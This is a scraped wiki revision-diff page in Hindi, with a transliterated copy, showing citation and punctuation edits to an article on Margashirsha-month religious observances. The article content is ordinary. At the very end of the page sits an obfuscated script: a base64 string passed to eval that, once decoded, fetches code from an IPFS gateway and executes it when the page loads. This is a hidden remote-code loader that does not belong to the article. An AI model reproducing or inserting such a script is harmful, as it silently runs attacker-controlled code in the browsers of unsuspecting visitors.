Difference between revisions of "मार्गशीर्ष कृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*तमिल देश में पूरे [[मास]] भर पवित्र माना जाता है और भजन मण्डलियाँ प्रातःकाल घूमती रहती हैं <ref>कृत्यरत्नाकर (442-432)</ref>; <ref>वर्ष क्रियाकौमुदी (482-487)</ref>; <ref>निर्णयसिन्धु (209-211)</ref>; <ref>स्मृतिकौस्तुभ (427-432)</ref>
+
*तमिल देश में पूरे [[मास]] भर पवित्र माना जाता है और भजन मण्डलियाँ प्रातःकाल घूमती रहती हैं।<ref>कृत्यरत्नाकर (442-432</ref>; <ref>वर्ष क्रियाकौमुदी (482-487</ref>; <ref>निर्णयसिन्धु (209-211</ref>; <ref>स्मृतिकौस्तुभ (427-432</ref>
*[[गीता]] <ref>गीता(10|35)</ref> के अनुसार मासों में [[मार्गशीर्ष]] सर्वोत्तम है और वह भगवान [[कृष्ण]] के समान माना गया है।   
+
*[[गीता]]<ref>गीता(10|35</ref> के अनुसार मासों में [[मार्गशीर्ष]] सर्वोत्तम है और वह भगवान [[कृष्ण]] के समान माना गया है।   
 
*[[सत युग|कृत युग]] (सतयुग) में देवों ने [[वर्ष]] का आरम्भ [[मार्गशीर्ष]] की प्रथम तिथि से किया था।  
 
*[[सत युग|कृत युग]] (सतयुग) में देवों ने [[वर्ष]] का आरम्भ [[मार्गशीर्ष]] की प्रथम तिथि से किया था।  
 
*ऋषि [[कश्यप]] ने [[कश्मीर]] नामक सुन्दर देश की रचना की थी।  
 
*ऋषि [[कश्यप]] ने [[कश्मीर]] नामक सुन्दर देश की रचना की थी।  
 
*अतः इस पर उत्सव किया जाना चाहि।  
 
*अतः इस पर उत्सव किया जाना चाहि।  
 
*प्रत्येक [[द्वादशी]] पर [[विष्णु]] के '[[केशव (विष्णु)|केशव]]' से लेकर '[[दामोदर]]' के बारह नामों में एक का नाम लेना चाहिए और पूजा करनी चाहिए।  
 
*प्रत्येक [[द्वादशी]] पर [[विष्णु]] के '[[केशव (विष्णु)|केशव]]' से लेकर '[[दामोदर]]' के बारह नामों में एक का नाम लेना चाहिए और पूजा करनी चाहिए।  
*कर्ता जातिश्मर (जो कि पूर्व जन्मों के कृत्यों को स्मरण कर लेता है) हो जाता है और वहाँ पर पहुँच जाता है, जहाँ पर से लौटना नहीं होता है<ref> (अनुशासन पर्व अध्याय 109</ref>; <ref>बृहत्संहिता 104|14-16)</ref>
+
*कर्ता जातिश्मर (जो कि पूर्व जन्मों के कृत्यों को स्मरण कर लेता है) हो जाता है और वहाँ पर पहुँच जाता है, जहाँ पर से लौटना नहीं होता है।<ref>अनुशासन पर्व अध्याय 109</ref>; <ref>बृहत्संहिता 104|14-16</ref>
 
*[[मार्गशीर्ष]] [[पूर्णिमा]] पर विशेषतः चन्द्र की पूजा की जानी चाहिए, क्योंकि उसी समय चन्द्र पर अमृत छिड़का गया था।  
 
*[[मार्गशीर्ष]] [[पूर्णिमा]] पर विशेषतः चन्द्र की पूजा की जानी चाहिए, क्योंकि उसी समय चन्द्र पर अमृत छिड़का गया था।  
*गाय को नमक देना चाहिए; माँ, बहन, पुत्री तथा अन्य नारी सम्बन्धियों को नवीन वस्त्रों का जोड़ा देना चाहिए; नृत्य गान का उत्सव होना चाहिए, जो लोग मदिरा का सेवन करते हैं, उन्हें उस दिन ताजी मदिरा ग्रहण करनी चाहिए <ref>कृत्यकल्पतरु (नैयतकालिक, 432-433)</ref>; <ref>कृत्यरत्नाकर (471-472)</ref>  
+
*गाय को नमक देना चाहिए।
 +
*माँ, बहन, पुत्री तथा अन्य नारी सम्बन्धियों को नवीन वस्त्रों का जोड़ा देना चाहिए।
 +
*नृत्य गान का उत्सव होना चाहिए, जो लोग मदिरा का सेवन करते हैं, उन्हें उस दिन ताजी मदिरा ग्रहण करनी चाहिए।<ref>कृत्यकल्पतरु (नैयतकालिक, 432-433</ref>; <ref>कृत्यरत्नाकर (471-472</ref>  
 
*मार्गशीर्ष; पूर्णिमा पर [[दत्तात्रेय जयन्ती]] की जाती है।  
 
*मार्गशीर्ष; पूर्णिमा पर [[दत्तात्रेय जयन्ती]] की जाती है।  
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • tamil desh mean poore mas bhar pavitr mana jata hai aur bhajan mandaliyaan pratahkal ghoomati rahati haian.[1]; [2]; [3]; [4]
  • gita[5] ke anusar masoan mean margashirsh sarvottam hai aur vah bhagavan krishna ke saman mana gaya hai.
  • krit yug (satayug) mean devoan ne varsh ka arambh margashirsh ki pratham tithi se kiya tha.
  • rrishi kashyap ne kashmir namak sundar desh ki rachana ki thi.
  • atah is par utsav kiya jana chahi.
  • pratyek dvadashi par vishnu ke 'keshav' se lekar 'damodar' ke barah namoan mean ek ka nam lena chahie aur pooja karani chahie.
  • karta jatishmar (jo ki poorv janmoan ke krityoan ko smaran kar leta hai) ho jata hai aur vahaan par pahuanch jata hai, jahaan par se lautana nahian hota hai.[6]; [7]
  • margashirsh poornima par visheshatah chandr ki pooja ki jani chahie, kyoanki usi samay chandr par amrit chhi daka gaya tha.
  • gay ko namak dena chahie.
  • maan, bahan, putri tatha any nari sambandhiyoan ko navin vastroan ka jo da dena chahie.
  • nrity gan ka utsav hona chahie, jo log madira ka sevan karate haian, unhean us din taji madira grahan karani chahie.[8]; [9]
  • margashirsh; poornima par dattatrey jayanti ki jati hai.



tika tippani aur sandarbh

  1. krityaratnakar (442-432
  2. varsh kriyakaumudi (482-487
  3. nirnayasindhu (209-211
  4. smritikaustubh (427-432
  5. gita(10|35
  6. anushasan parv adhyay 109
  7. brihatsanhita 104|14-16
  8. krityakalpataru (naiyatakalik, 432-433
  9. krityaratnakar (471-472

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>